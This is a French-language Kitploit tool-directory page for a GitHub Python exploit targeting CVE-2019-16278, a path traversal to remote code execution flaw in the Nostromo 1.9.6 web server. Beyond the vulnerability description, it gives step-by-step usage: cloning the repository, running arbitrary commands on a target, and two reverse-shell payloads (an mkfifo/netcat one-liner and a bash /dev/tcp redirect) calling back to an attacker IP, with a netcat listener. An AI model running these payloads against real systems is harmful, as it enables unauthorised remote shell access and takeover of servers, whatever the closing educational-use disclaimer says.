Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/cybermonkx/cve-2019-16278_nostromo-1.9.6---remote-code-execution
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed TeamingDéveloppement de Charges Utiles
GitHubcybermonkx/cve-2019-16278_nostromo-1.9.6---remote-code-execution

CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution

Voir le dépôt
1il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Un attaquant non authentifié peut forcer les points du serveur vers un fichier shell comme « /bin/sh » et exécuter des commandes arbitraires en raison de l’échec de la vérification de l’URL, ce qui conduit à un parcours de chemin vers tout fichier existant sur le système. Les versions de Nostromo telles que 1.9.6 ne parviennent pas à vérifier cette URL.

Partager

POC

Dépôt : https://github.com/CybermonkX/CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution.git

📜 Description

Ce dépôt contient un exploit Python pour CVE-2019-16278, une vulnérabilité dans Nostromo 1.9.6 (un serveur web). Cette vulnérabilité permet l'exécution de code à distance (Remote Code Execution - RCE) en exploitant un parcours de répertoire pour exécuter des commandes arbitraires sur le système cible.

🚀 Fonctionnalités

  • Exécution de commandes shell personnalisées sur la cible vulnérable.
  • Prise en charge des payloads de reverse shell.
  • Possibilité de personnaliser la taille de la réponse de la cible.

🛠️ Prérequis

  • Python 3.x
  • Une machine exécutant Nostromo 1.9.6 (la cible vulnérable).
  • Netcat (nc) pour capturer les reverse shells.

⚙️ Utilisation

Étape 1 : Cloner le dépôt

root@kitploit:~
git clone https://github.com/CybermonkX/CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution.git
cd CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution

### Étape 2 : Exécuter l'exploit  

```bash
python3 CVE-2019-16278.py -t <IP_CIBLE> -p <PORT> -c "<COMMANDE>" [-b <OCTETS_A_LIRE>]

Arguments :

ArgumentDescriptionRequisDéfaut
-t, --targetL'adresse IP de la cibleOuiAucun
-p, --portLe port de la cibleOuiAucun
-c, --commandLa commande à exécuter sur le serveurOuiAucun
-b, --bytesNombre d'octets à lire dans la réponseNon4096

🧑‍💻 Exemples

Exemple 1 : Exécuter whoami sur la cible

root@kitploit:~
python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "whoami"

Exemple 2 : Reverse Shell avec Netcat

Étape 1 : Démarrer un écouteur Netcat sur votre machine d'attaque :

root@kitploit:~
nc -lvnp 443

Étape 2 : Exécuter l'exploit avec un payload de reverse shell :

root@kitploit:~
python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.16.5 443 > /tmp/f"

Exemple 3 : Reverse Shell via /dev/tcp

root@kitploit:~
python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "bash -i >& /dev/tcp/10.10.16.5/443 0>&1"

🔍 Détails de la vulnérabilité

  • CVE : CVE-2019-16278
  • Logiciel concerné : Serveur web Nostromo 1.9.6
  • Type : Parcours de répertoire -> Exécution de code à distance

⚠️ Avertissement

Cet outil est destiné uniquement à des fins éducatives. Ne l'utilisez pas sur des systèmes dont vous n'êtes pas propriétaire ou pour lesquels vous n'avez pas d'autorisation explicite de test. L'accès non autorisé à des systèmes est illégal. Utilisez-le de manière responsable.

Télécharger l’outil